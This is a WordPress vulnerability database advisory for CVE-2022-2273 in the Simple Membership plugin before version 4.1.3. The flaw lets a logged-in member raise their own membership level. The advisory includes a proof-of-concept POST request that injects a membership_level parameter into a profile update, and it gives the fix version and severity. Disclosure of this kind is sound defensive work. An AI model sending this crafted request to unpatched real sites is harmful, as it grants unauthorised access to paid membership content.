WordPress Plugin Vulnerabilities

Simple Membership < 4.1.3 - Membership Privilege Escalation

Description

The plugin does not properly validate the membership_level parameter when editing a profile, allowing members to escalate to a higher membership level by using a crafted POST request.

Note: This only affects membership from the plugin, not the WordPress role

Proof of Concept

To increase the level, the attacker needs to add the membership_level parameter to the POST request sent when updating the profile.

POST /membership-login/membership-profile/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: [logged in user with membership level 2]

swpm_profile_edit_nonce_val=1c449c7f1a&_wp_http_referer=%2Fmembership-login%2Fmembership-profile%2F&email=user%40localhost.localhost&password=&password_re=&first_name=user_low&last_name=user_low&phone=&address_street=123&address_city=1234&address_state=123&address_zipcode=&country=&company_name=&swpm_editprofile_submit=Update&action=custom_posts&membership_level=3

Affects Plugins

Plugin icon
simple-membership
Fixed in 4.1.3

References

CVE
CVE-2022-2273

Classification

Type
PRIVESC
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-269
CVSS
4.6 (medium)

Miscellaneous

Original Researcher
Jet Infosystems
Submitter website
https://jet.su/
Verified
Yes
WPVDB ID
724729d9-1c4a-485c-9c90-a27664c47c84

Timeline

Publicly Published
2022-07-06 (about 1 years ago)
Added
2022-07-06 (about 1 years ago)
Last Updated
2023-04-10 (about 1 years ago)

Other

Published
Title
Published
2018-10-11
Title
WooCommerce <= 3.4.5 - Authenticated File Deletion to Privilege Escalation
Published
2020-01-13
Title
Ultimate Member < 2.1.3 - Insecure Direct Object Reference (IDOR)
Published
2023-03-23
Title
WooCommerce Payments < 5.6.2 - Unauthenticated Privilege Escalation
Published
2023-06-19
Title
MStore API < 3.9.9 - Unauthenticated Privilege Escalation
Published
2023-06-19
Title
Greeklish-permalink < 3.5 - Unauthenticated Post Slug Update